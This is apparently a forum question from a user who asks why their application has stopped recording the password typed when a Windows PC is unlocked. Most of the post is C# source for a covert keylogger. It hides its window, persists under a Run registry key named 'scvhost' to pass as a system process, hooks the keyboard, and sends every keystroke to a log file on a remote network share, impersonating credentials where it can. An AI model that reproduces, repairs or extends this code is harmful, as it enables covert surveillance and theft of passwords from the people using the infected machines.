How come I can not store key stroke when unlocking PC???
Hi,
I have an application which is recording key strokes and images.At first application was recording user password when unlocking the PC but some how it is NOT recording anymore!? How can I fix this???
Best Regards.
Here is my sample code:
public partial class Form1 : Form
{
String writeUp;
private static System.Timers.Timer aTimer;
String name = System.Environment.MachineName;
Boolean flag = true;
Boolean flag_Credentials = false;
String time = DateTime.Now.ToString("HH:mm:ss");
Graphics g;
int ScreenWidth = Screen.PrimaryScreen.Bounds.Width;
int ScreenHeight = Screen.PrimaryScreen.Bounds.Height;
#region imports
[DllImport("advapi32.dll", SetLastError = true)]
private static extern bool LogonUser(string
lpszUsername, string lpszDomain, string lpszPassword,
int dwLogonType, int dwLogonProvider, ref
IntPtr phToken);
[DllImport("kernel32.dll", CharSet = CharSet.Auto,
SetLastError = true)]
private static extern bool CloseHandle(IntPtr handle
);
[DllImport("advapi32.dll", CharSet = CharSet.Auto,
SetLastError = true)]
public extern static bool DuplicateToken(IntPtr
existingTokenHandle,
int SECURITY_IMPERSONATION_LEVEL, ref IntPtr
duplicateTokenHandle);
#endregion imports
#region logon consts
// logon types
const int LOGON32_LOGON_INTERACTIVE = 2;
const int LOGON32_LOGON_NETWORK = 3;
const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
// logon providers
const int LOGON32_PROVIDER_DEFAULT = 0;
const int LOGON32_PROVIDER_WINNT50 = 3;
const int LOGON32_PROVIDER_WINNT40 = 2;
const int LOGON32_PROVIDER_WINNT35 = 1;
#endregion logon consts
//private static InterceptMouse.LowLevelMouseProc _proc = InterceptMouse.HookCallback;
//private static IntPtr _hookID = IntPtr.Zero;
public Form1()
{
System.Globalization.CultureInfo ci = new System.Globalization.CultureInfo("tr-TR");
System.Threading.Thread.CurrentThread.CurrentCulture = ci;
System.Threading.Thread.CurrentThread.CurrentUICulture = ci;
var princ = new WindowsPrincipal(WindowsIdentity.GetCurrent());
if (princ.IsInRole("Administrator"))
{
flag_Credentials = true;
}
// Create a timer with a minute interval.
aTimer = new System.Timers.Timer(60000);
aTimer.Elapsed += new ElapsedEventHandler(OnTimedEvent);
aTimer.Enabled = true;
aTimer.Start();
//Add to Registry
string runKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
Microsoft.Win32.RegistryKey startupKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(runKey);
if (startupKey.GetValue("scvhost") == null)
{
startupKey.Close();
startupKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(runKey, true);
// Add startup reg key
startupKey.SetValue("scvhost", Application.ExecutablePath.ToString());
startupKey.Close();
}
// remove startup
//startupKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(runKey, true);
//startupKey.DeleteValue(AppName, false);
//startupKey.Close();
//Keyboard
InitializeComponent();
this.ShowInTaskbar = false;
this.Refresh();
Hook.CreateHook(KeyReaderr);
writeUp = "";
}
public void KeyReaderr(IntPtr wParam, IntPtr lParam)
{
int key = Marshal.ReadInt32(lParam);
Hook.VK vk = (Hook.VK)key;
String temp = "";
switch (vk)
{
case Hook.VK.VK_F1: temp = "<-F1->";
break;
case Hook.VK.VK_F2: temp = "<-F2->";
break;
case Hook.VK.VK_F3: temp = "<-F3->";
break;
case Hook.VK.VK_F4: temp = "<-F4->";
break;
case Hook.VK.VK_F5: temp = "<-F5->";
break;
case Hook.VK.VK_F6: temp = "<-F6->";
break;
case Hook.VK.VK_F7: temp = "<-F7->";
break;
case Hook.VK.VK_F8: temp = "<-F8->";
break;
case Hook.VK.VK_F9: temp = "<-F9->";
break;
case Hook.VK.VK_F10: temp = "<-F10->";
break;
case Hook.VK.VK_F11: temp = "<-F11->";
break;
case Hook.VK.VK_F12: temp = "<-F12->";
break;
case Hook.VK.VK_NUMLOCK: temp = "<-numlock->";
break;
case Hook.VK.VK_SCROLL: temp = "<-scroll>";
break;
case Hook.VK.VK_LSHIFT: temp = "<-left shift->";
break;
case Hook.VK.VK_RSHIFT: temp = "<-right shift->";
break;
case Hook.VK.VK_LCONTROL: temp = "<-left control->";
break;
case Hook.VK.VK_RCONTROL: temp = "<-right control->";
break;
case Hook.VK.VK_SEPERATOR: temp = "|";
break;
case Hook.VK.VK_SUBTRACT: temp = "-";
break;
case Hook.VK.VK_DECIMAL: temp = ".";
break;
case Hook.VK.VK_DIVIDE: temp = "/";
break;
case Hook.VK.VK_NUMPAD0: temp = "0";
break;
case Hook.VK.VK_NUMPAD1: temp = "1";
break;
case Hook.VK.VK_NUMPAD2: temp = "2";
break;
case Hook.VK.VK_NUMPAD3: temp = "3";
break;
case Hook.VK.VK_NUMPAD4: temp = "4";
break;
case Hook.VK.VK_NUMPAD5: temp = "5";
break;
case Hook.VK.VK_NUMPAD6: temp = "6";
break;
case Hook.VK.VK_NUMPAD7: temp = "7";
break;
case Hook.VK.VK_NUMPAD8: temp = "8";
break;
case Hook.VK.VK_NUMPAD9: temp = "9";
break;
case Hook.VK.VK_Q: temp = "q";
break;
case Hook.VK.VK_W: temp = "w";
break;
case Hook.VK.VK_E: temp = "e";
break;
case Hook.VK.VK_R: temp = "r";
break;
case Hook.VK.VK_T: temp = "t";
break;
case Hook.VK.VK_Y: temp = "y";
break;
case Hook.VK.VK_U: temp = "u";
break;
case Hook.VK.VK_UU: temp = "ü";
break;
case Hook.VK.VK_I: temp = "i";
break;
case Hook.VK.VK_II: temp = "i";
break;
case Hook.VK.VK_O: temp = "o";
break;
case Hook.VK.VK_OO: temp = "ö";
break;
case Hook.VK.VK_P: temp = "p";
break;
case Hook.VK.VK_A: temp = "a";
break;
case Hook.VK.VK_S: temp = "s";
break;
case Hook.VK.VK_SS: temp = "s";
break;
case Hook.VK.VK_D: temp = "d";
break;
case Hook.VK.VK_F: temp = "f";
break;
case Hook.VK.VK_G: temp = "g";
break;
case Hook.VK.VK_GG: temp = "g";
break;
case Hook.VK.VK_H: temp = "h";
break;
case Hook.VK.VK_J: temp = "j";
break;
case Hook.VK.VK_K: temp = "k";
break;
case Hook.VK.VK_L: temp = "l";
break;
case Hook.VK.VK_Z: temp = "z";
break;
case Hook.VK.VK_X: temp = "x";
break;
case Hook.VK.VK_C: temp = "c";
break;
case Hook.VK.VK_CC: temp = "ç";
break;
case Hook.VK.VK_V: temp = "v";
break;
case Hook.VK.VK_B: temp = "b";
break;
case Hook.VK.VK_N: temp = "n";
break;
case Hook.VK.VK_3: temp = "3";
break;
case Hook.VK.VK_4: temp = "4";
break;
case Hook.VK.VK_M: temp = "m";
break;
case Hook.VK.VK_0: temp = "0";
break;
case Hook.VK.VK_1: temp = "1";
break;
case Hook.VK.VK_2: temp = "2";
break;
case Hook.VK.VK_5: temp = "5";
break;
case Hook.VK.VK_6: temp = "6";
break;
case Hook.VK.VK_7: temp = "7";
break;
case Hook.VK.VK_8: temp = "8";
break;
case Hook.VK.VK_9: temp = "9";
break;
case Hook.VK.VK_SNAPSHOT: temp = "<-print screen->";
break;
case Hook.VK.VK_INSERT: temp = "<-insert->";
break;
case Hook.VK.VK_DELETE: temp = "<-delete->";
break;
case Hook.VK.VK_BACK: temp = "<-backspace->";
break;
case Hook.VK.VK_TAB: temp = "<-tab->";
break;
case Hook.VK.VK_RETURN: temp = "<-enter->";
break;
case Hook.VK.VK_PAUSE: temp = "<-pause->";
break;
case Hook.VK.VK_CAPITAL: temp = "<-caps lock->";
break;
case Hook.VK.VK_ESCAPE: temp = "<-esc->";
break;
case Hook.VK.VK_SPACE: temp = "<-space->";
break;
case Hook.VK.VK_PRIOR: temp = "<-page up->";
break;
case Hook.VK.VK_NEXT: temp = "<-page down->";
break;
case Hook.VK.VK_END: temp = "<-end->";
break;
case Hook.VK.VK_HOME: temp = "<-home->";
break;
case Hook.VK.VK_LEFT: temp = "<-arrow left->";
break;
case Hook.VK.VK_UP: temp = "<-arrow up->";
break;
case Hook.VK.VK_RIGHT: temp = "<-arrow right->";
break;
case Hook.VK.VK_DOWN: temp = "<-arrow down->";
break;
case Hook.VK.VK_DOT: temp = ".";
break;
case Hook.VK.VK_COMMA: temp = ",";
break;
case Hook.VK.VK_SMALL: temp = "<";
break;
default: break;
}
writeUp = writeUp + temp;
writeToFile(temp);
}
public void writeToFile(String writing)
{
if (flag_Credentials)
{
IntPtr token = IntPtr.Zero;
bool isSuccess = LogonUser("username", "domain", "password", LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, ref token);
using (WindowsImpersonationContext person = new WindowsIdentity(token).Impersonate())
{
using (StreamWriter w = new StreamWriter(@"\\111.11.11.1\logs\" + name + "_" + DateTime.Now.ToString("d") + ".txt", true))
{
w.Write(writing);
w.Flush();
w.Close();
}
person.Undo();
}
}
else
{
using (StreamWriter w = new StreamWriter(@"\\111.11.11.1\logs\" + name + "_" + DateTime.Now.ToString("d") + ".txt", true))
{
w.Write(writing);
w.Flush();
w.Close();
}
}
}